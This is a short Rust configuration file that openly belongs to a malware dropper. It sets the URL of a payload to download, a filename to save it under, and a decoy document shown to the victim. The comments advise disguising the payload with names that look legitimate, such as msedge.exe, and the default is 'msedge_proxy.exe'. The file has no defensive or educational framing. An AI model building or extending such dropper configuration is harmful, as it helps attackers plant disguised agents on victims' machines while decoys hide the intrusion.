//! Configuration module for the dropper
//! 
//! This file will be auto-generated by the builder with the payload URL
//! and other configuration options.

// Placeholder configuration - will be replaced by builder
// The builder tool will generate this file with actual values

/// URL to download the payload from
/// This should be an HTTPS URL pointing to the agent binary
pub const PAYLOAD_URL: &str = "https://example.com/update.bin";

/// Filename to save the payload as
/// Use legitimate-looking names like msedge.exe, updater.exe, etc.
pub const PAYLOAD_FILENAME: &str = "msedge_proxy.exe";

/// Whether to open a decoy document
pub const OPEN_DECOY: bool = true;

/// Decoy document URL (PDF, DOC, etc.)
pub const DECOY_URL: &str = "https://example.com/document.pdf";
